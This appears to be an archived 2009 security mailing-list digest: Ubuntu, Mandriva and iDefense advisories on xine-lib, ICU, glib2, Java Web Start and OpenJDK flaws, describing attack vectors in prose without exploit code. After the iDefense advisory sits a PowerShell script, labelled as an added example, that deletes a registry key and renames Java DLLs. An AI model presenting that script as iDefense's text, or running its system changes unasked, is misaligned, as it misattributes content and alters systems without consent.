    http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-all-plugins_1.1.15-0ubuntu3.2_all.deb
      Size/MD5:    55676 93fa74dbaa1665a4e31025ebfaa0f287
    http://security.ubuntu.com/ubuntu/pool/universe/x/xine-lib/libxine1-plugins_1.1.15-0ubuntu3.2_all.deb
      Size/MD5:    55668 c13473de5ab986c102c048d31054d539

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.15-0ubuntu3.2_amd64.deb
      Size/MD5:   331948 666feb394e8cf1bc6a9e8713df08f58b
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-bin_1.1.15-0ubuntu3.2_amd64.deb
      Size/MD5:  1232494 fa306767fc61f3da519a2a96e2b1304a
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-console_1.1.15-0ubuntu3.2_amd64.deb
      Size/MD5:    58700 cf1f8f074db761c5c5bd010e56858e86
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.15-0ubuntu3.2_amd64.deb
      Size/MD5:  4001498 13ca26c6f004574f04e8315b3fe20f41
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-ffmpeg_1.1.15-0ubuntu3.2_amd64.deb
      Size/MD5:   393594 e37dd5c047d5fd4e74021b32bc88f12b
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-gnome_1.1.15-0ubuntu3.2_amd64.deb
      Size/MD5:    15568 e3e8075adcb41a348a5f895dea80dda1
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.15-0ubuntu3.2_amd64.deb
      Size/MD5:   924454 25e7f194ec05ef0bc39c6970cfd3d86a
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-x_1.1.15-0ubuntu3.2_amd64.deb
      Size/MD5:   213378 24f5791685da86b3236211f23f9684f9
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.15-0ubuntu3.2_amd64.deb
      Size/MD5:     1300 1be987a3b431dab7a11423c407442e1c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.1.15-0ubuntu3.2_i386.deb
      Size/MD5:   331962 3519e5e211ac0cad798aa60c4a849288
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-bin_1.1.15-0ubuntu3.2_i386.deb
      Size/MD5:  1344010 6dadb820d74d559909208be4e14dfc0f
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-console_1.1.15-0ubuntu3.2_i386.deb
      Size/MD5:    61400 578cbce2bdc4d595b8a692527caba7d1
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-dbg_1.1.15-0ubuntu3.2_i386.deb
      Size/MD5:  4179676 a323d9c1a5c08de0998b14b8004604e6
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-ffmpeg_1.1.15-0ubuntu3.2_i386.deb
      Size/MD5:   392556 b160f84ca09e9937df160d540a179255
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-gnome_1.1.15-0ubuntu3.2_i386.deb
      Size/MD5:    15062 8af12d1826ef1ea9860c5b254071df64
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.15-0ubuntu3.2_i386.deb
      Size/MD5:   931050 4cb1f3722044e5600bdd2f47a9d182f4
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1-x_1.1.15-0ubuntu3.2_i386.deb
      Size/MD5:   212396 f6865eb3d8bd3db62927b23ecb103e01
    http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.1.15-0ubuntu3.2_i386.deb
      Size/MD5:     1304 49fdeabc2a19afd2373c9388d24542c1

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.15-0ubuntu3.2_lpia.deb
      Size/MD5:   331970 aa5c6d57f76da674d3786459a8badff7
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.15-0ubuntu3.2_lpia.deb
      Size/MD5:  1227008 f31dfb1198a1c13394a264ffb46b203d
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.15-0ubuntu3.2_lpia.deb
      Size/MD5:    60786 0167d08e60cd94b171954370a33a4556
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.15-0ubuntu3.2_lpia.deb
      Size/MD5:  3908218 501a5762f566a4eb9bb0917147ba3032
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-ffmpeg_1.1.15-0ubuntu3.2_lpia.deb
      Size/MD5:   392472 b59c0580705f3d684a59aaff6028c0cc
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-gnome_1.1.15-0ubuntu3.2_lpia.deb
      Size/MD5:    15036 543dab3f22a50d076fb2c0406407f530
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.15-0ubuntu3.2_lpia.deb
      Size/MD5:   930218 40d546adfabfb90de5788806a7a92b9e
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.15-0ubuntu3.2_lpia.deb
      Size/MD5:   211434 c69f67d6611346acde544ba7c5c427ff
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.15-0ubuntu3.2_lpia.deb
      Size/MD5:     1302 a849b16e9850fa376c54eb7e5738e9f3

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.15-0ubuntu3.2_powerpc.deb
      Size/MD5:   331968 960929e7602647935024f4da09907570
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.15-0ubuntu3.2_powerpc.deb
      Size/MD5:  1240800 89807d2cccad96e01ee05cc6c7430699
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.15-0ubuntu3.2_powerpc.deb
      Size/MD5:    64684 009109dafc80cabf49f2d78fcce0d6fa
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.15-0ubuntu3.2_powerpc.deb
      Size/MD5:  4016826 01aee7e37af3dd78e1f42baa08d138b1
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-ffmpeg_1.1.15-0ubuntu3.2_powerpc.deb
      Size/MD5:   425990 bfb0d13fb6b6dd3d69ed19a8f4262501
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-gnome_1.1.15-0ubuntu3.2_powerpc.deb
      Size/MD5:    21622 753b36a137aa03c090b20c484316acb5
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.15-0ubuntu3.2_powerpc.deb
      Size/MD5:  1119396 491f25071bc22fb8ae812a69a867ef01
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.15-0ubuntu3.2_powerpc.deb
      Size/MD5:   225638 70cde5d8faa10f41f0d4c827b0cdef55
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.15-0ubuntu3.2_powerpc.deb
      Size/MD5:     1314 3ff68c89fb33b569afab53bd6132c44d

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine-dev_1.1.15-0ubuntu3.2_sparc.deb
      Size/MD5:   331972 fbfaef3a3348ea0adb11a12809bbbba1
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-bin_1.1.15-0ubuntu3.2_sparc.deb
      Size/MD5:  1220876 7a4fc40d366024d44287b3a9ffae8e60
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-console_1.1.15-0ubuntu3.2_sparc.deb
      Size/MD5:    51178 373c356eac258890a66dfbda46a957e7
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-dbg_1.1.15-0ubuntu3.2_sparc.deb
      Size/MD5:  3583032 b01b680f06d99b2335a3cbd8d5d3c9a2
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-ffmpeg_1.1.15-0ubuntu3.2_sparc.deb
      Size/MD5:   400690 2cf2ada8e4dfc556b7f049940b3bb8fc
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-gnome_1.1.15-0ubuntu3.2_sparc.deb
      Size/MD5:    14664 fecc45a514a3fe37d86a9e301db440be
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-misc-plugins_1.1.15-0ubuntu3.2_sparc.deb
      Size/MD5:   933820 88b74b50a11729ff715da479d12b902a
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1-x_1.1.15-0ubuntu3.2_sparc.deb
      Size/MD5:   185908 1d7e345b1a33dce0745d2e5c46aefd07
    http://ports.ubuntu.com/pool/main/x/xine-lib/libxine1_1.1.15-0ubuntu3.2_sparc.deb
      Size/MD5:     1312 b60a69e409ad4fb8dc8643e2b821f06a



--=-4WqfmitOoPo1pECx714A
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAknL1yYACgkQLMAs/0C4zNpPPwCeIN6UXtl9vW4SpIUL19qd9Slm
AOgAn2wgzrj9o3sUxLuozpYamP+rEGDV
=ztHl
-----END PGP SIGNATURE-----

--=-4WqfmitOoPo1pECx714A--

From - Fri Mar 27 14:32:50 2009
Subject: [USN-747-1] ICU vulnerability
From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>,
full-disclosure@lists.grok.org.uk
Date: Thu, 26 Mar 2009 15:28:21 -0400

===========================================================
Ubuntu Security Notice USN-747-1             March 26, 2009
icu vulnerability
CVE-2008-1036
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 7.10
Ubuntu 8.04 LTS
Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libicu34                        3.4.1a-1ubuntu1.6.06.2

Ubuntu 7.10:
  libicu36                        3.6-3ubuntu0.2

Ubuntu 8.04 LTS:
  libicu38                        3.8-6ubuntu0.1

Ubuntu 8.10:
  libicu38                        3.8.1-2ubuntu0.1

After a standard system upgrade you need to restart applications linked
against libicu, such as OpenOffice.org, to effect the necessary changes.

Details follow:

It was discovered that libicu did not correctly handle certain invalid
encoded data. If a user or automated system were tricked into processing
specially crafted data with applications linked against libicu, certain
content filters could be bypassed.



From - Fri Mar 27 14:42:50 2009
Date: Thu, 26 Mar 2009 15:47:02 -0400
From: iDefense Labs <labs-no-reply@idefense.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 03.26.09: Sun Java Web Start (JWS) GIF Decoding Heap Corruption Vulnerability


iDefense Security Advisory 03.25.09
http://labs.idefense.com/intelligence/vulnerabilities/
Mar 25, 2009

I. BACKGROUND

Java Web Start (JWS) is a framework built by Sun that is used to run
Java applications outside of the browser. It is distributed with the
Java Runtime Environment (JRE) installation. JWS is typically launched
by clicking on a link in the browser and results in a separate process
being started that is not tied to the JVM inside the browser. In order
to accomplish this, the Java Network Launching Protocol (JNLP) is used
to communicate with the JWS process. This is done by referencing a
.jnlp file from the Web page, which is then requested and forwarded to
the JWS application. This XML-based file contains various parameters
that describe the Java application to be run.

II. DESCRIPTION

Remote exploitation of a heap corruption vulnerability in Sun
Microsystems Inc.'s Java Web Start could allow an attacker to execute
arbitrary code with privileges of the current user.

When JWS starts up, it displays a splash screen. By default, the image
displayed on this splash screen is a GIF file provided by Sun, but it
is possible for a JNLP file to provide its own splash logo. This allows
an attacker to pass an arbitrary GIF file to the splash logo parsing
code to trigger the vulnerability.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user running JWS. There are several ways
to exploit this vulnerability. The most common exploitation vector is
through the browser. By persuading a user to follow a link (or by
compromising a trusted site), the vulnerability can be exploited by
simply viewing a webpage. It would also be possible for an attacker to
e-mail a JNLP file to a user or place it on a shared network drive. In
this situation, a targeted user would need to manually open the file.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Java Web
Start version 1.6_11 on Windows and Linux. Previous versions may also
be affected.

Sun Microsystems reports that the vulnerability can occur in the
following Java SE and Java SE for Business releases for Windows,
Solaris, and Linux:

    * JDK and JRE 6 Update 12 and earlier
    * JDK and JRE 5.0 Update 17 and earlier

and in the following Java SE for Business release for Windows, Solaris,
and Linux:

    * SDK and JRE 1.4.2_19 and earlier

and in the following Java SE release for Windows and Solaris:

    * SDK and JRE 1.3.1_24 and earlier

V. WORKAROUND

On Windows, automatic exploitation through double-clicking such a file
or opening it through the browser can be prevented by removing the file
associations for JNLP files. This can be done by removing the registry
key for .jnlp in the 'HKEY_CLASSES_ROOT' registry hive. If a user
specifically selects the Java Web Start application to open the JNLP
file, however, exploitation is still possible.

An additional workaround which will prevent all exploitation attempts is
to rename the splashscreen library so that Java Web Start will not be
able to load it. This file is found in different locations depending on
the platform and installation choices. One such location is:

C:\Program Files\Java\jre6\bin\splashscreen.dll

Renaming this file to splashscreen.dll.bak will prevent it from being
loaded.

VI. VENDOR RESPONSE

Sun Microsystems Inc. has released a patch which addresses this issue.
For more information, consult their advisory at the following URL:

http://sunsolve.sun.com/search/document.do?assetkey=1-66-254571-1

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

02/18/2009  - Initial Contact
02/18/2009  - PoC Requested
02/19/2009  - PoC Sent
03/10/2009  - Disclosure Date Set
03/25/2009  - Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by regenrecht.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
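
The two workarounds in section V (WORKAROUND) of the advisory above can be audited, and optionally applied, with a script like the following. It is an added example, not part of the iDefense advisory; the search roots under "Program Files\Java" and the backup file name are assumptions, since the advisory names only one example location for splashscreen.dll.

```powershell
# Added example: audit (and with -Apply, apply) the advisory's two workarounds.
# Assumption: JRE installs live under "Program Files\Java"; pass -JavaRoot otherwise.
[CmdletBinding(SupportsShouldProcess = $true)]
param(
    [switch]$Apply,
    [string[]]$JavaRoot = @("$env:ProgramFiles\Java", "${env:ProgramFiles(x86)}\Java")
)

$assocKey = 'Registry::HKEY_CLASSES_ROOT\.jnlp'

function Get-JnlpWorkaroundState {
    # Workaround 1: is the .jnlp file association still registered?
    $assocPresent = Test-Path -LiteralPath $assocKey

    # Workaround 2: which installs still have a loadable splashscreen.dll?
    $dlls = foreach ($root in $JavaRoot) {
        if ($root -and (Test-Path -LiteralPath $root)) {
            Get-ChildItem -LiteralPath $root -Recurse -Filter 'splashscreen.dll' -File `
                -ErrorAction SilentlyContinue |
                Where-Object { $_.Name -eq 'splashscreen.dll' }
        }
    }
    [pscustomobject]@{
        JnlpAssociationPresent = $assocPresent
        SplashscreenLibraries  = @($dlls | ForEach-Object { $_.FullName })
    }
}

$state = Get-JnlpWorkaroundState
$state | Format-List

if ($Apply) {
    if ($state.JnlpAssociationPresent) {
        # Back up the key first so the association can be restored after patching.
        $backup = Join-Path $env:TEMP 'jnlp-association-backup.reg'
        & reg.exe export 'HKCR\.jnlp' $backup /y | Out-Null
        if ($LASTEXITCODE -ne 0) { throw 'Backup of HKCR\.jnlp failed; key left in place.' }
        if ($PSCmdlet.ShouldProcess($assocKey, 'Remove .jnlp file association')) {
            Remove-Item -LiteralPath $assocKey -Recurse
        }
    }
    # Per the advisory, only this second step blocks the case where a user
    # explicitly chooses Java Web Start to open a JNLP file.
    foreach ($dll in $state.SplashscreenLibraries) {
        if ($PSCmdlet.ShouldProcess($dll, 'Rename to splashscreen.dll.bak')) {
            Rename-Item -LiteralPath $dll -NewName 'splashscreen.dll.bak'
        }
    }
}
```

Run without arguments it only reports state; `-Apply -WhatIf` previews the changes, which need an elevated session to take effect.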

To: bugtraq@securityfocus.com
Subject: [ MDVSA-2009:080 ] glib2.0
Date: Thu, 26 Mar 2009 22:50:00 +0100
From: security@mandriva.com

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2009:080
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : glib2.0
 Date    : March 26, 2009
 Affected: 2008.0, 2008.1, 2009.0
 _______________________________________________________________________

 Problem Description:

 Multiple integer overflows in GLib's Base64 encoding and decoding
 functions enable attackers (possibly remote ones, depending on the
 applications linked against glib2 - mostly GNOME ones) either to
 cause a denial of service or to execute arbitrary code via untrusted
 input (CVE-2008-4316).
 
 This update provides the fix for that security issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4316
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2008.0:
 ec6549c72d1fb6125ab8d398586ea4fb  2008.0/i586/glib2.0-common-2.14.1-2.1mdv2008.0.i586.rpm
 af169954484c24fb30888317ae22b408  2008.0/i586/glib-gettextize-2.14.1-2.1mdv2008.0.i586.rpm
 f933fbb158f4a94311ea0adb0267abfd  2008.0/i586/libglib2.0_0-2.14.1-2.1mdv2008.0.i586.rpm
 36f304c0aec1f7989146364acaf8c0b2  2008.0/i586/libglib2.0_0-devel-2.14.1-2.1mdv2008.0.i586.rpm 
 1786bde9976bce5014db73d0801b38ac  2008.0/SRPMS/glib2.0-2.14.1-2.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 9cf29b7dbebf5048084b6b1f35e0f4cb  2008.0/x86_64/glib2.0-common-2.14.1-2.1mdv2008.0.x86_64.rpm
 270bcf8ba069c5ac6b6e6cf89987b807  2008.0/x86_64/glib-gettextize-2.14.1-2.1mdv2008.0.x86_64.rpm
 31031ac78ab9d873a29fa369ff30e610  2008.0/x86_64/lib64glib2.0_0-2.14.1-2.1mdv2008.0.x86_64.rpm
 9c1d61a59e7c60092e1c0e3908bb6a65  2008.0/x86_64/lib64glib2.0_0-devel-2.14.1-2.1mdv2008.0.x86_64.rpm 
 1786bde9976bce5014db73d0801b38ac  2008.0/SRPMS/glib2.0-2.14.1-2.1mdv2008.0.src.rpm

 Mandriva Linux 2008.1:
 1baba5d7eb9f0c432bf73fd88b4ed7b2  2008.1/i586/glib2.0-common-2.16.2-1.1mdv2008.1.i586.rpm
 25195a507ab1cb4c83821ec13b73c2de  2008.1/i586/glib-gettextize-2.16.2-1.1mdv2008.1.i586.rpm
 0842c6fcbc536211ccf2a0a4d87e3546  2008.1/i586/libgio2.0_0-2.16.2-1.1mdv2008.1.i586.rpm
 0e8cf91144c192f2bb5f35baf83f962c  2008.1/i586/libglib2.0_0-2.16.2-1.1mdv2008.1.i586.rpm
 6323a69186cb517ae2863d7a76781048  2008.1/i586/libglib2.0-devel-2.16.2-1.1mdv2008.1.i586.rpm 
 7ae19c9ab3b92c24968805d227a59016  2008.1/SRPMS/glib2.0-2.16.2-1.1mdv2008.1.src.rpm

 Mandriva Linux 2008.1/X86_64:
 1589cb70c3243cef09da4d50c15b09b1  2008.1/x86_64/glib2.0-common-2.16.2-1.1mdv2008.1.x86_64.rpm
 6c2579e55949fbe1835adf31ea5131bd  2008.1/x86_64/glib-gettextize-2.16.2-1.1mdv2008.1.x86_64.rpm
 194712afcd7513be076a6759525f12f9  2008.1/x86_64/lib64gio2.0_0-2.16.2-1.1mdv2008.1.x86_64.rpm
 3da1dd0e0141705c2c0e31499dd75608  2008.1/x86_64/lib64glib2.0_0-2.16.2-1.1mdv2008.1.x86_64.rpm
 36eed7d79a1e42f832db1e45fba41e7c  2008.1/x86_64/lib64glib2.0-devel-2.16.2-1.1mdv2008.1.x86_64.rpm 
 7ae19c9ab3b92c24968805d227a59016  2008.1/SRPMS/glib2.0-2.16.2-1.1mdv2008.1.src.rpm

 Mandriva Linux 2009.0:
 690e5195cc87714bdc3cc0fbd5d1e443  2009.0/i586/glib2.0-common-2.18.1-1.1mdv2009.0.i586.rpm
 d9ca28417fae46f7fb2623a12d43ae0a  2009.0/i586/glib-gettextize-2.18.1-1.1mdv2009.0.i586.rpm
 515b3c6e02aaa3d2323b2205b77e4f60  2009.0/i586/libgio2.0_0-2.18.1-1.1mdv2009.0.i586.rpm
 05ef65b0189ed3df27459b0357e84156  2009.0/i586/libglib2.0_0-2.18.1-1.1mdv2009.0.i586.rpm
 7433775a074a0631631f9a36c38cb603  2009.0/i586/libglib2.0-devel-2.18.1-1.1mdv2009.0.i586.rpm 
 dc74fa4eccc0e8a4fe016d6e48efd7c2  2009.0/SRPMS/glib2.0-2.18.1-1.1mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 a354c7986fc2d17ea31679d5c9c3c32c  2009.0/x86_64/glib2.0-common-2.18.1-1.1mdv2009.0.x86_64.rpm
 c696c96b510cc0d983c3f4449208109d  2009.0/x86_64/glib-gettextize-2.18.1-1.1mdv2009.0.x86_64.rpm
 fc5eb4080df3b6670b53952c82f0df47  2009.0/x86_64/lib64gio2.0_0-2.18.1-1.1mdv2009.0.x86_64.rpm
 29fc292f7f40bcf4a64b889694141d5e  2009.0/x86_64/lib64glib2.0_0-2.18.1-1.1mdv2009.0.x86_64.rpm
 479553db25caae6550ab085986b88801  2009.0/x86_64/lib64glib2.0-devel-2.18.1-1.1mdv2009.0.x86_64.rpm 
 dc74fa4eccc0e8a4fe016d6e48efd7c2  2009.0/SRPMS/glib2.0-2.18.1-1.1mdv2009.0.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>

Date: Thu, 26 Mar 2009 15:01:35 -0700
From: Kees Cook <kees@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: [USN-748-1] OpenJDK vulnerabilities

==========================================================
Ubuntu Security Notice USN-748-1             March 26, 2009
openjdk-6 vulnerabilities
CVE-2006-2426, CVE-2009-1093, CVE-2009-1094, CVE-2009-1095,
CVE-2009-1096, CVE-2009-1097, CVE-2009-1098, CVE-2009-1100,
CVE-2009-1101, CVE-2009-1102
==========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 8.10

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.10:
  icedtea6-plugin                 6b12-0ubuntu6.4
  openjdk-6-jdk                   6b12-0ubuntu6.4
  openjdk-6-jre                   6b12-0ubuntu6.4
  openjdk-6-jre-headless          6b12-0ubuntu6.4
  openjdk-6-jre-lib               6b12-0ubuntu6.4

After a standard system upgrade you need to restart any Java applications
to effect the necessary changes.

Details follow:

It was discovered that font creation could leak temporary files.
If a user were tricked into loading a malicious program or applet,
a remote attacker could consume disk space, leading to a denial of
service. (CVE-2006-2426, CVE-2009-1100)

It was discovered that the lightweight HttpServer did not correctly close
files on dataless connections.  A remote attacker could send specially
crafted requests, leading to a denial of service. (CVE-2009-1101)

Certain 64-bit Java actions would crash an application.  A local attacker
might be able to cause a denial of service. (CVE-2009-1102)

It was discovered that LDAP connections did not close correctly.
A remote attacker could send specially crafted requests, leading to a
denial of service.  (CVE-2009-1093)

Java LDAP routines did not unserialize certain data correctly.  A remote
attacker could send specially crafted requests that could lead to
arbitrary code execution. (CVE-2009-1094)

Java did not correctly check certain JAR headers.  If a user or
automated system were tricked into processing a malicious JAR file,
a remote attacker could crash the application, leading to a denial of
service. (CVE-2009-1095, CVE-2009-1096)

It was discovered that PNG and GIF decoding in Java could lead to memory
corruption.  If a user or automated system were tricked into processing
a specially crafted image, a remote attacker could crash the application,
leading to a denial of service. (CVE-2009-1097, CVE-2009-1098)


Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.4.diff.gz
      Size/MD5:   257215 876f885acf37c0817a35956e6520de3a
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12-0ubuntu6.4.dsc
      Size/MD5:     2355 d8a4b0fe60497fd1f61c978c3c78e571
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6_6b12.orig.tar.gz
      Size/MD5: 54363262 f3aa01206f2192464b998fb7cc550686

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-doc_6b12-0ubuntu6.4_all.deb
      Size/MD5:  8469732 b032a764ce88bd155f9aaba02ecc6566
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b12-0ubuntu6.4_all.deb
      Size/MD5:  4709872 299164cb69aa3ec883867afb7d8d9054
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-source_6b12-0ubuntu6.4_all.deb
      Size/MD5: 25627544 e62afaf0e692fa587de0056cf014175d
    http://security.ubuntu.com/ubuntu/pool/universe/o/openjdk-6/openjdk-6-source-files_6b12-0ubuntu6.4_all.deb
      Size/MD5: 49156004 2de3d037ef595b34ccb98324b11f1159

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.4_amd64.deb
      Size/MD5:    81028 8952bc76c555dc8d950b2d3bfa940b7c
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.4_amd64.deb
      Size/MD5: 47372520 d70f9ed68d2837e2f3f107a607b5cc96
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.4_amd64.deb
      Size/MD5:  2366132 75294026f904346ec76397cd388252c3
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.4_amd64.deb
      Size/MD5:  9944822 cfd88c5f3fe97c67d8eca19908344823
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.4_amd64.deb
      Size/MD5: 24099904 24468c4793c974819f83b06fb41adc90
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.4_amd64.deb
      Size/MD5:   241642 240d8346bb895f9623091c94c81ae466

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.4_i386.deb
      Size/MD5:    71516 5c67a03b0011a3bd117fae210ca27cd9
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.4_i386.deb
      Size/MD5: 101847192 302ab3721553014290ce4bfdee6cb6fb
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.4_i386.deb
      Size/MD5:  2348630 1a4c103e4d235f7d641f2e0f2ddfe4c3
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.4_i386.deb
      Size/MD5:  9952338 c6bc056c5fa988f8841542a6801aa84d
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b12-0ubuntu6.4_i386.deb
      Size/MD5: 25177778 41fa22a436950239955756efe7bc9112
    http://security.ubuntu.com/ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b12-0ubuntu6.4_i386.deb
      Size/MD5:   230774 5c5188e21a7a5a76763d7f651162dc3a

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/o/openjdk-6/icedtea6-plugin_6b12-0ubuntu6.4_lpia.deb
      Size/MD5:    72110 1b419781fc73fe42b85ff180f520edc2
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-dbg_6b12-0ubuntu6.4_lpia.deb
      Size/MD5: 101930130 abc646dc9df27f3415ff07dcb0c38e51
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-demo_6b12-0ubuntu6.4_lpia.deb
      Size/MD5:  2345400 ef0b99c18c2ce4cd1ae68f1f20d08566
    http://ports.ubuntu.com/pool/main/o/openjdk-6/openjdk-6-jdk_6b12-0ubuntu6.4_lpia.deb
